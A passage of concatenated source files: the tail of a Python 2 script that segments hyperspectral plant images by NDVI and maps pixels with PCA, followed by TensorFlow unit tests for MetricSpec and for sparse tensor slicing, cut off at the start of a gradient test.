    # substantially faster) because the covariance matrix is symmetric.
    R = np.cov(data, rowvar=False)
    evals, evecs = LA.eigh(R)
    # eigh returns eigenvalues in ascending order; reorder to decreasing
    # and permute the eigenvectors to match.
    idx = np.argsort(evals)[::-1]
    evecs = evecs[:, idx]
    evals = evals[idx]
    # Keep only the leading components and project the centered data.
    evecs = evecs[:, :dims_rescaled_data]
    return np.dot(evecs.T, data.T).T, evals, evecs
# Separating all analyzed pixels using the first two PCs
def plot_pca(data):
    """Scatter-plot the first two principal components of *data* and return
    all projected scores.

    Blocks until the matplotlib window is closed (plt.show()).
    NOTE(review): the unpacked names are misleading -- PCA2 returns
    (scores, eigenvalues, eigenvectors), so ``data_orig`` is actually the
    eigenvalue array and ``a`` the eigenvector matrix.
    """
    clr1 = '#2026B2'
    fig = plt.figure()
    ax1 = fig.add_subplot(111)
    data_resc, data_orig,a = PCA2(data)
    # PC1 on the x-axis, PC2 on the y-axis.
    ax1.plot(data_resc[:, 0], data_resc[:, 1], '.', mfc=clr1, mec=clr1)
    plt.show()
    return data_resc
# Using NDVI to segment all plant area by defining threshold greater than 0.25
def rmstem(p705, p750, upper_bound, bottom_bound, left_bound, right_bound):
    """Split the pixels of a bounded region into plant and background.

    NDVI is computed per pixel from the 750nm and 705nm reflectance bands;
    pixels with NDVI > 0.25 are classified as plant.  Both return values are
    lists of [row, col] pairs in row-major order, restricted (inclusively)
    to the rectangle given by the four bounds.
    """
    plant_pixels = []
    background_pixels = []
    n_rows, n_cols = np.shape(p705)[0], np.shape(p705)[1]
    top, bottom = int(upper_bound), int(bottom_bound)
    left, right = int(left_bound), int(right_bound)
    for row in range(n_rows):
        if not (top <= row <= bottom):
            continue
        for col in range(n_cols):
            if not (left <= col <= right):
                continue
            ndvi = (p750[row, col] - p705[row, col]) / (p750[row, col] + p705[row, col])
            if ndvi > 0.25:
                plant_pixels.append([row, col])
            else:
                background_pixels.append([row, col])
    return plant_pixels, background_pixels
# Calculating the median intensity of pixels in the non-plant area
def NP(target, pic2):
    """Median intensity of *pic2* over the [row, col] coordinates in *target*.

    Used to estimate the typical background (non-plant) intensity of an
    image band.
    """
    intensities = [pic2[row, col] for row, col in target]
    return np.median(intensities)
# Storing the reflectance of each pixel and their corresponding positions in the original image
def PCA(target, k, pic2, n):
    """Map each plant pixel to its normalized reflectance.

    Keys have the form ``"row-col-n"`` (so the original image position and
    plant id *n* can be recovered later); values are the pixel intensity in
    *pic2* divided by *k*, the background median.
    """
    return {"{0}-{1}-{2}".format(row, col, n): pic2[row, col] / k
            for (row, col) in target}
# sh is the reference file showing which file corresponds to which wavelength
sh = open('wavelength_foldid.txt','r')
sh.readline()  # skip the header line
kdict = {}
# build a library to include file~wavelength information
for line in sh:
    new = line.strip().split('\t')
    # key: fold id (last column), value: wavelength (first column)
    kdict[new[-1]] = new[0]
sh.close()
# because of no germination in most of first three days, we just skip them
# to speed up running the code
first3 = set([])
for i in range(1,4):
    first3.add('Day_'+str(i).zfill(3))
ll = []          # per-pixel reflectance rows, filled by the main loop below
whole = os.listdir(mfold)
mdict = {}       # wavelength name -> {"row-col-plant": normalized intensity}
tlist = []
# The date you want to visualize, e.g. Day_028
date = sys.argv[2]
# Main acquisition loop: for every plant folder, load the requested day's
# hyperspectral stack, segment the plant area via NDVI, and record the
# background-normalized reflectance of every plant pixel per wavelength.
for j1 in whole:
    tlist.append(j1)
    for i1 in os.listdir('{0}/{1}/HYP SV 90/'.format(mfold,j1)):
        if i1 != date:continue
        subset = os.listdir('{0}/{1}/HYP SV 90/{2}'.format(mfold,j1,i1))
        # in every folder, the images of 35_0_0.png and 45_0_0.png should be
        # used firstly in order to subtract the plant area
        # NOTE(review): `if True:` makes the `else: print j1` branch below
        # unreachable -- this looks like a stubbed-out try/except or
        # condition; confirm against the original repository.
        if True:
            m705 = cv2.imread('{0}/{1}/HYP SV 90/{2}/35_0_0.png'.format(mfold,j1,i1))
            m750 = cv2.imread('{0}/{1}/HYP SV 90/{2}/45_0_0.png'.format(mfold,j1,i1))
            # converting plant images from RGB to GRAY channel
            tm705 = cv2.cvtColor(m705,cv2.COLOR_BGR2GRAY)
            tm750 = cv2.cvtColor(m750,cv2.COLOR_BGR2GRAY)
            tm705 = tm705.astype(np.float)
            tm750 = tm750.astype(np.float)
            # defining the interested area that we are going to analyze the plant
            rmg,back = rmstem(tm705,tm750,45,445,30,273)
            for i in subset:
                # first two images are not useful and just skip them
                if i == '0_0_0.png':continue
                if i == '1_0_0.png':continue
                # info.txt is not an image file
                if i == 'info.txt':continue
                name = i.replace('_0_0.png','')
                t = cv2.imread('{0}/{1}/HYP SV 90/{2}/{3}'.format(mfold,j1,i1,i))
                t = t.astype(np.float)
                t1 = t[:,:,0]
                # normalize each band by the median background intensity
                cint = NP(back,t1)
                total = PCA(rmg,cint,t1,j1)
                if name not in mdict:
                    mdict[name] = {}
                mdict[name].update(total)
            # pixel keys of the first wavelength index all subsequent lookups
            wavelengths = list(mdict)
            pixels = list(mdict[wavelengths[0]])
        else:
            print j1
# Assemble the (n_pixels, n_wavelengths) reflectance matrix: one row per
# plant pixel, one column per wavelength.
for p in pixels:
    ll.append([])
    for w in wavelengths:
        ll[-1].append(mdict[w][p])
ll_array = np.array(ll)
# Project all pixels at once onto the first three principal components
# (plot_pca also shows a PC1-vs-PC2 scatter plot).
data_resc = plot_pca(ll_array)
myxvals = {}
myyvals = {}
mycvals = {}
myplant = set([])
# Regroup the PC scores by plant id: key 'PC<x>-<plant>' maps to parallel
# lists of image x coordinates, (negated) y coordinates and PC values.
for x in range(3):
    mytitle = "PC {0}".format(x+1)
    for name,val in zip(pixels,data_resc[:,x]):
        # Python 2: map() returns a list, so l is [row, col].
        l = map(int,name.split('-')[:2])
        myplant.add(name.split('-')[2])
        myid = 'PC'+str(x)+'-'+name.split('-')[2]
        if myid not in myxvals:
            myxvals[myid] = []
            myyvals[myid] = []
            mycvals[myid] = []
        # negate the row so the plant is drawn upright in image coordinates
        myyvals[myid].append(l[0]*(-1))
        myxvals[myid].append(l[1])
        mycvals[myid].append(val)
n = 0
myxtick = []
myxname = []
ncvals = {}
# For each plant, collect the three PC values of every pixel position and
# min-max normalize each PC into [0, 1] so it can be used as an RGB channel.
for i in myplant:
    myxname.append(i)
    pc0 = 'PC0'+'-'+i
    pc1 = 'PC1'+'-'+i
    pc2 = 'PC2'+'-'+i
    if i not in ncvals:
        ncvals[i] = {}
        ncvals[i][pc0] = []
        ncvals[i][pc1] = []
        ncvals[i][pc2] = []
    # b is real value of pc value, a is the position of pc value
    for a,b in enumerate(mycvals[pc0]):
        name = str(myyvals[pc0][a])+'-'+str(myxvals[pc0][a])
        if name not in ncvals[i]:
            ncvals[i][name] = []
        # normalize PCA components for each plant of each genotype by the
        # formula: normalized_value = (value-min_value)/(max_value-min_value)
        ncvals[i][name].append((mycvals[pc0][a]-min(mycvals[pc0]))/(max(mycvals[pc0])-min(mycvals[pc0])))
        ncvals[i][name].append((mycvals[pc1][a]-min(mycvals[pc1]))/(max(mycvals[pc1])-min(mycvals[pc1])))
        ncvals[i][name].append((mycvals[pc2][a]-min(mycvals[pc2]))/(max(mycvals[pc2])-min(mycvals[pc2])))
n = 0
plt.show()
# Render every plant side by side (offset by 250 px per plant) as a scatter
# of its pixels colored by the three normalized PCs used as RGB channels.
fig = plt.figure()
ax = fig.add_subplot('111')
num = 0
for i in myplant:
    xvals = []
    yvals = []
    cvals = []
    pc0 = 'PC0'+'-'+i
    # bounding box of this plant's pixels
    nx = max(myxvals[pc0])-min(myxvals[pc0])
    ny = max(myyvals[pc0])-min(myyvals[pc0])
    for ii in range(nx):
        x = ii + min(myxvals[pc0])
        for jj in range(ny):
            y = jj + min(myyvals[pc0])
            pos = str(y)+'-'+str(x)
            if pos in ncvals[i]:
                clist = ncvals[i][pos]
                # shift each plant right by 250 px to avoid overlap
                xvals.append(ii+num*250)
                yvals.append(jj)
                cvals.append((clist[0],clist[1],clist[2]))
    # label each plant at the horizontal center of its pixel cloud
    myxtick.append(np.median(xvals))
    myxname.append(i)
    num += 1
    ax.scatter(xvals,yvals,color=cvals)
ax.set_xticks(myxtick)
ax.set_xticklabels(myxname)
ax.set_yticklabels([])
plt.show()
| bsd-3-clause |
DCSaunders/tensorflow | tensorflow/contrib/learn/python/learn/metric_spec_test.py | 13 | 9091 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MetricSpec."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.metric_spec import MetricSpec
def test_metric(predictions, labels, weights=None):
return predictions, labels, weights
class MetricSpecTest(tf.test.TestCase):
  """Checks that MetricSpec routes prediction/label/weight tensors into the
  wrapped metric_fn by key, and rejects ambiguous dict/tensor combinations.

  Plain strings stand in for tensors: test_metric echoes whatever it was
  called with, so the routing can be asserted directly.
  """

  def test_create_metric_ops(self):
    # All three keys specified: each tensor is looked up in its dict.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    passed = MetricSpec(metric_fn=test_metric,
                        prediction_key="pred1",
                        label_key="label1",
                        weight_key="feature2").create_metric_ops(features,
                                                                 labels,
                                                                 predictions)

    self.assertEqual(passed[0], "pred1_tensor")
    self.assertEqual(passed[1], "label1_tensor")
    self.assertEqual(passed[2], "feature2_tensor")

  def test_no_weight(self):
    # weight_key is optional; the metric_fn then receives weights=None.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    passed = MetricSpec(metric_fn=test_metric,
                        prediction_key="pred1",
                        label_key="label1").create_metric_ops(features, labels,
                                                              predictions)

    self.assertEqual(passed[0], "pred1_tensor")
    self.assertEqual(passed[1], "label1_tensor")
    self.assertEqual(passed[2], None)

  def test_fail_no_prediction(self):
    # A multi-element predictions dict without prediction_key is ambiguous.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    self.assertRaisesRegexp(ValueError,
                            "MetricSpec without specified prediction_key "
                            "requires predictions tensor or single element "
                            "dict, got",
                            MetricSpec(metric_fn=test_metric,
                                       label_key="label1",
                                       weight_key="feature2").create_metric_ops,
                            features, labels, predictions)

  def test_fail_no_label(self):
    # A multi-element labels dict without label_key is ambiguous.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    self.assertRaisesRegexp(ValueError,
                            "MetricSpec without specified label_key requires "
                            "labels tensor or single element dict, got",
                            MetricSpec(metric_fn=test_metric,
                                       prediction_key="pred1",
                                       weight_key="feature2").create_metric_ops,
                            features, labels, predictions)

  def test_single_prediction(self):
    # A bare (non-dict) predictions tensor needs no prediction_key.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = "pred1_tensor"

    passed = MetricSpec(metric_fn=test_metric,
                        label_key="label1",
                        weight_key="feature2").create_metric_ops(features,
                                                                 labels,
                                                                 predictions)

    self.assertEqual(passed[0], "pred1_tensor")
    self.assertEqual(passed[1], "label1_tensor")
    self.assertEqual(passed[2], "feature2_tensor")

  def test_single_label(self):
    # A bare (non-dict) labels tensor needs no label_key.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = "label1_tensor"
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    passed = MetricSpec(metric_fn=test_metric,
                        prediction_key="pred1",
                        weight_key="feature2").create_metric_ops(features,
                                                                 labels,
                                                                 predictions)

    self.assertEqual(passed[0], "pred1_tensor")
    self.assertEqual(passed[1], "label1_tensor")
    self.assertEqual(passed[2], "feature2_tensor")

  def test_fail_single_prediction(self):
    # Specifying prediction_key while passing a bare tensor is an error.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor", "label2": "label2_tensor"}
    predictions = "pred1_tensor"

    self.assertRaisesRegexp(ValueError,
                            "MetricSpec with prediction_key specified requires "
                            "predictions dict, got",
                            MetricSpec(metric_fn=test_metric,
                                       prediction_key="pred1",
                                       label_key="label1",
                                       weight_key="feature2").create_metric_ops,
                            features, labels, predictions)

  def test_fail_single_label(self):
    # Specifying label_key while passing a bare tensor is an error.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = "label1_tensor"
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    self.assertRaisesRegexp(ValueError,
                            "MetricSpec with label_key specified requires "
                            "labels dict, got",
                            MetricSpec(metric_fn=test_metric,
                                       prediction_key="pred1",
                                       label_key="label1",
                                       weight_key="feature2").create_metric_ops,
                            features, labels, predictions)

  def test_str(self):
    # str() must mention the metric_fn name and all configured keys.
    metric_spec = MetricSpec(metric_fn=test_metric,
                             label_key="label1",
                             prediction_key="pred1",
                             weight_key="feature2")
    string = str(metric_spec)
    self.assertIn("test_metric", string)
    self.assertIn("label1", string)
    self.assertIn("pred1", string)
    self.assertIn("feature2", string)

  def test_partial_str(self):
    # functools.partial has no __name__; str() must still show the
    # underlying function's name.

    def custom_metric(predictions, labels, stuff, weights=None):
      return predictions, labels, weights, stuff

    partial_metric = functools.partial(custom_metric, stuff=5)
    metric_spec = MetricSpec(metric_fn=partial_metric,
                             label_key="label1",
                             prediction_key="pred1",
                             weight_key="feature2")
    self.assertIn("custom_metric", str(metric_spec))

  def test_partial(self):
    # A partial with pre-bound extra arguments works like a plain metric_fn,
    # and exceptions raised inside it propagate unchanged.
    features = {"feature1": "feature1_tensor", "feature2": "feature2_tensor"}
    labels = {"label1": "label1_tensor"}
    predictions = {"pred1": "pred1_tensor", "pred2": "pred2_tensor"}

    def custom_metric(predictions, labels, stuff, weights=None):
      if stuff:
        return predictions, labels, weights
      else:
        raise ValueError("Nooooo")

    partial_metric = functools.partial(custom_metric, stuff=5)
    passed = MetricSpec(metric_fn=partial_metric,
                        label_key="label1",
                        prediction_key="pred1",
                        weight_key="feature2").create_metric_ops(features,
                                                                 labels,
                                                                 predictions)
    self.assertEqual(passed[0], "pred1_tensor")
    self.assertEqual(passed[1], "label1_tensor")
    self.assertEqual(passed[2], "feature2_tensor")

    broken_partial_metric = functools.partial(custom_metric, stuff=0)
    self.assertRaisesRegexp(ValueError,
                            "Nooooo",
                            MetricSpec(metric_fn=broken_partial_metric,
                                       prediction_key="pred1",
                                       label_key="label1",
                                       weight_key="feature2").create_metric_ops,
                            features, labels, predictions)
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  tf.test.main()
| apache-2.0 |
arborh/tensorflow | tensorflow/python/kernel_tests/sparse_slice_op_test.py | 22 | 13631 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SparseReorder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import sparse_ops
import tensorflow.python.ops.sparse_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class SparseSliceOpTest(test.TestCase):
  """Tests for sparse_ops.sparse_slice: indices, values and dense_shape of
  row/column slices, including slices that extend past the input shape
  (which are clipped), plus gradient checks.

  The ASCII diagrams in the fixtures show the dense layout; numbers are the
  stored values, blanks are implicit zeros.
  """

  def _SparseTensor_4x6(self, val_dtype=np.int64):
    # [0 |  |2 |  |4 |5 ]
    # [  |11|  |13|14|  ]
    # [20|  |  |23|  |25]
    # [30|  |32|33|  |35]
    ind = np.array([[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4],
                    [2, 0], [2, 3], [2, 5], [3, 0], [3, 2], [3, 3],
                    [3, 5]]).astype(np.int64)
    val = np.array([0, 2, 4, 5, 11, 13, 14, 20, 23, 25, 30, 32, 33,
                    35]).astype(val_dtype)
    shape = np.array([4, 6]).astype(np.int64)
    return sparse_tensor.SparseTensor(ind, val, shape)

  def _SparseTensor_5x7(self):
    # [0 |  |2 |  |4 |5 |  ]
    # [  |11|  |13|14|  |16]
    # [20|  |  |23|  |25|  ]
    # [30|  |32|33|  |35|  ]
    # [  |41|  |  |44|  |46]
    ind = np.array([[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4],
                    [1, 6], [2, 0], [2, 3], [2, 5], [3, 0], [3, 2], [3, 3],
                    [3, 5], [4, 1], [4, 4], [4, 6]]).astype(np.int64)
    val = np.array(
        [0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25, 30, 32, 33, 35, 41, 44,
         46]).astype(np.int64)
    shape = np.array([5, 7]).astype(np.int64)
    return sparse_tensor.SparseTensor(ind, val, shape)

  def _SparseTensorValue_3x4x2(self):
    # A rank-3 string fixture (currently unused by the tests below).
    #  slice(:,:, 0)
    #  ['a0'|    |'b0'|    ]
    #  [    |'c0'|    |'d0']
    #  [    |    |'e0'|    ]
    #  slice(:,:, 1)
    #  ['a1'|    |'b1'|    ]
    #  [    |'c1'|    |'d1']
    #  [    |    |'e1'|    ]
    ind = np.array([[0, 0, 0], [0, 0, 1], [0, 2, 0], [0, 2, 1], [1, 1, 0],
                    [1, 1, 1], [1, 3, 0], [1, 3, 1], [2, 2, 0],
                    [2, 2, 1]]).astype(np.int64)
    val = np.array(['a0', 'a1', 'b0', 'b1', 'c0', 'c1', 'd0', 'd1', 'e0', 'e1'])
    shape = np.array([3, 4, 2]).astype(np.int64)
    return sparse_tensor.SparseTensorValue(ind, val, shape)

  def _SparseTensor_3x4x2(self):
    return sparse_tensor.SparseTensor.from_value(
        self._SparseTensorValue_3x4x2())

  @test_util.run_deprecated_v1
  def testSliceMatrixRows(self):
    # Row slices; the second slice requests [3, 7] but is clipped to [2, 6].
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_4x6()
      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [2, 6])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [2, 0], [3, 7])
      self.assertAllEqual(
          sp_tensor0.indices.eval(),
          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4]])
      self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 4, 5, 11, 13, 14])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [2, 6])
      self.assertAllEqual(
          sp_tensor1.indices.eval(),
          [[0, 0], [0, 3], [0, 5], [1, 0], [1, 2], [1, 3], [1, 5]])
      self.assertAllEqual(sp_tensor1.values.eval(),
                          [20, 23, 25, 30, 32, 33, 35])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 6])

  @test_util.run_deprecated_v1
  def testSliceMatrixUnevenCols(self):
    # Column slices whose widths do not evenly divide the 7 columns.
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_5x7()
      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [5, 3])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 3], [5, 2])
      sp_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 5], [5, 2])

      self.assertAllEqual(
          sp_tensor0.indices.eval(),
          [[0, 0], [0, 2], [1, 1], [2, 0], [3, 0], [3, 2], [4, 1]])
      self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 11, 20, 30, 32, 41])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [5, 3])
      self.assertAllEqual(sp_tensor1.indices.eval(),
                          [[0, 1], [1, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(sp_tensor1.values.eval(), [4, 13, 14, 23, 33, 44])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [5, 2])
      self.assertAllEqual(sp_tensor2.indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(sp_tensor2.values.eval(), [5, 16, 25, 35, 46])
      self.assertAllEqual(sp_tensor2.dense_shape.eval(), [5, 2])

      # Width-2 slices; the last one starts at the final column and is
      # clipped to a single column.
      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [5, 2])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 2], [5, 2])
      sp_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 2])
      sp_tensor3 = sparse_ops.sparse_slice(sp_input, [0, 6], [5, 2])
      self.assertAllEqual(sp_tensor0.indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
      self.assertAllEqual(sp_tensor0.values.eval(), [0, 11, 20, 30, 41])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [5, 2])
      self.assertAllEqual(sp_tensor1.indices.eval(),
                          [[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
      self.assertAllEqual(sp_tensor1.values.eval(), [2, 13, 23, 32, 33])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [5, 2])
      self.assertAllEqual(sp_tensor2.indices.eval(),
                          [[0, 0], [0, 1], [1, 0], [2, 1], [3, 1], [4, 0]])
      self.assertAllEqual(sp_tensor2.values.eval(), [4, 5, 14, 25, 35, 44])
      self.assertAllEqual(sp_tensor2.dense_shape.eval(), [5, 2])
      self.assertAllEqual(sp_tensor3.indices.eval(), [[1, 0], [4, 0]])
      self.assertAllEqual(sp_tensor3.values.eval(), [16, 46])
      self.assertAllEqual(sp_tensor3.dense_shape.eval(), [5, 1])

  @test_util.run_deprecated_v1
  def testSliceMatrixUnevenRows(self):
    # Row slices whose heights do not evenly divide the 5 rows.
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_5x7()
      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [3, 7])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [3, 0], [3, 7])
      self.assertAllEqual(sp_tensor0.indices.eval(),
                          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
                           [1, 4], [1, 6], [2, 0], [2, 3], [2, 5]])
      self.assertAllEqual(sp_tensor0.values.eval(),
                          [0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [3, 7])
      self.assertAllEqual(
          sp_tensor1.indices.eval(),
          [[0, 0], [0, 2], [0, 3], [0, 5], [1, 1], [1, 4], [1, 6]])
      self.assertAllEqual(sp_tensor1.values.eval(),
                          [30, 32, 33, 35, 41, 44, 46])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 7])

      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [2, 7])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [2, 0], [2, 7])
      sp_tensor2 = sparse_ops.sparse_slice(sp_input, [4, 0], [2, 7])
      self.assertAllEqual(
          sp_tensor0.indices.eval(),
          [[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4], [1, 6]])
      self.assertAllEqual(sp_tensor0.values.eval(),
                          [0, 2, 4, 5, 11, 13, 14, 16])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [2, 7])
      # NOTE(review): sp_tensor1's indices are not asserted here, only its
      # values and shape.
      self.assertAllEqual(sp_tensor1.values.eval(),
                          [20, 23, 25, 30, 32, 33, 35])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 7])
      self.assertAllEqual(sp_tensor2.indices.eval(), [[0, 1], [0, 4], [0, 6]])
      self.assertAllEqual(sp_tensor2.values.eval(), [41, 44, 46])
      self.assertAllEqual(sp_tensor2.dense_shape.eval(), [1, 7])
    # NOTE(review): dead statement, kept for fidelity.
    return

  @test_util.run_deprecated_v1
  def testSliceAllRows(self):
    # Single-row slices; oversized requests are clipped to the input shape.
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_4x6()
      sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [1, 6])
      sp_tensor1 = sparse_ops.sparse_slice(sp_input, [1, 0], [1, 6])
      sp_tensor2 = sparse_ops.sparse_slice(sp_input, [2, 0], [1, 7])
      sp_tensor3 = sparse_ops.sparse_slice(sp_input, [3, 0], [2, 7])
      self.assertAllEqual(sp_tensor0.indices.eval(),
                          [[0, 0], [0, 2], [0, 4], [0, 5]])
      self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 4, 5])
      self.assertAllEqual(sp_tensor0.dense_shape.eval(), [1, 6])
      self.assertAllEqual(sp_tensor1.indices.eval(), [[0, 1], [0, 3], [0, 4]])
      self.assertAllEqual(sp_tensor1.values.eval(), [11, 13, 14])
      self.assertAllEqual(sp_tensor1.dense_shape.eval(), [1, 6])
      self.assertAllEqual(sp_tensor2.indices.eval(), [[0, 0], [0, 3], [0, 5]])
      self.assertAllEqual(sp_tensor2.values.eval(), [20, 23, 25])
      self.assertAllEqual(sp_tensor2.dense_shape.eval(), [1, 6])
      self.assertAllEqual(sp_tensor3.indices.eval(),
                          [[0, 0], [0, 2], [0, 3], [0, 5]])
      self.assertAllEqual(sp_tensor3.values.eval(), [30, 32, 33, 35])
      self.assertAllEqual(sp_tensor3.dense_shape.eval(), [1, 6])

  @test_util.run_deprecated_v1
  def testSliceColumns(self):
    # Column slices of the 4x6 fixture; oversized sizes are clipped.
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_4x6()
      sparse_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [4, 2])
      sparse_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 2], [5, 2])
      sparse_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 3])

      self.assertAllEqual(sparse_tensor0.indices.eval(),
                          [[0, 0], [1, 1], [2, 0], [3, 0]])
      self.assertAllEqual(sparse_tensor0.values.eval(), [0, 11, 20, 30])
      self.assertAllEqual(sparse_tensor0.dense_shape.eval(), [4, 2])
      self.assertAllEqual(sparse_tensor1.indices.eval(),
                          [[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
      self.assertAllEqual(sparse_tensor1.values.eval(), [2, 13, 23, 32, 33])
      self.assertAllEqual(sparse_tensor1.dense_shape.eval(), [4, 2])
      self.assertAllEqual(sparse_tensor2.indices.eval(),
                          [[0, 0], [0, 1], [1, 0], [2, 1], [3, 1]])
      self.assertAllEqual(sparse_tensor2.values.eval(), [4, 5, 14, 25, 35])
      self.assertAllEqual(sparse_tensor2.dense_shape.eval(), [4, 2])

  @test_util.run_deprecated_v1
  def testSliceAllColumns(self):
    # Single-column slices covering every column of the 4x6 fixture.
    with self.session(use_gpu=False):
      sp_input = self._SparseTensor_4x6()
      sparse_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [4, 1])
      sparse_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 1], [4, 1])
      sparse_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 2], [4, 1])
      sparse_tensor3 = sparse_ops.sparse_slice(sp_input, [0, 3], [4, 1])
      sparse_tensor4 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 1])
      sparse_tensor5 = sparse_ops.sparse_slice(sp_input, [0, 5], [6, 3])
      self.assertAllEqual(sparse_tensor0.indices.eval(),
                          [[0, 0], [2, 0], [3, 0]])
      self.assertAllEqual(sparse_tensor0.values.eval(), [0, 20, 30])
      self.assertAllEqual(sparse_tensor0.dense_shape.eval(), [4, 1])
      self.assertAllEqual(sparse_tensor1.indices.eval(), [[1, 0]])
      self.assertAllEqual(sparse_tensor1.values.eval(), [11])
      self.assertAllEqual(sparse_tensor1.dense_shape.eval(), [4, 1])
      self.assertAllEqual(sparse_tensor2.indices.eval(), [[0, 0], [3, 0]])
      self.assertAllEqual(sparse_tensor2.values.eval(), [2, 32])
      self.assertAllEqual(sparse_tensor2.dense_shape.eval(), [4, 1])
      self.assertAllEqual(sparse_tensor3.indices.eval(),
                          [[1, 0], [2, 0], [3, 0]])
      self.assertAllEqual(sparse_tensor3.dense_shape.eval(), [4, 1])
      self.assertAllEqual(sparse_tensor3.values.eval(), [13, 23, 33])
      self.assertAllEqual(sparse_tensor4.indices.eval(), [[0, 0], [1, 0]])
      self.assertAllEqual(sparse_tensor4.values.eval(), [4, 14])
      self.assertAllEqual(sparse_tensor4.dense_shape.eval(), [4, 1])
      self.assertAllEqual(sparse_tensor5.indices.eval(),
                          [[0, 0], [2, 0], [3, 0]])
      self.assertAllEqual(sparse_tensor5.values.eval(), [5, 25, 35])
      self.assertAllEqual(sparse_tensor5.dense_shape.eval(), [4, 1])

  @test_util.run_deprecated_v1
  def testGradients(self):
